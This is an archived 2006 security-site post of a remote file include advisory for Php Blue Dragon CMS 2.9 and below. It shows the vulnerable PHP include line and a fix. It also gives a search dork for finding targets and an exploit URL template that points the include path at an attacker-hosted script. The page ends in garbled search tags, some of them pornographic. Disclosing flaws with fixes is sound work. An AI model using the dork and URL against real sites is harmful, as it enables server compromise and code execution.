about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability




2006-05-12 Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability
Rated as : Moderate Risk

################DEVIL TEAM THE BEST POLISH TEAM#################
#Php Blue Dragon Platinum - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#dork: powered by Php Blue Dragon Platinum
################################################################
[code]
// Szukanie u.ytkownika
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
->
SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
[/code]

Fix:
[code]
// Szukanie u.ytkownika
$vsDragonRootPath = "./";
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
->
SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts]
securitydot.net - 2006-05-12

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 04:38:15 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.animal free antiv php-nuke 2 hanging i...FFX29I www.fullse ayuasharib Bicycle Amricansex www.live98 p...n57.co www.slazy IBP 2..7 www.sexara for www.se news for c mosConfig_ free sex p ayuasharib www.xiangt www.tamil www.an1098 Download m hamid bouc www.slazy j...]=//// Snehasexph regentpowe gory www.qqmx8. www.freeya News Searc www.maixu. www.avizon ps2 wwww.tudou iso-tsap proxies to hlv4life tamil act news for c Microsoft i.../porta Vedio xxx. Bigboobspa pre-auth www.gzqizh PHP Live! vuln/explo PHP Live!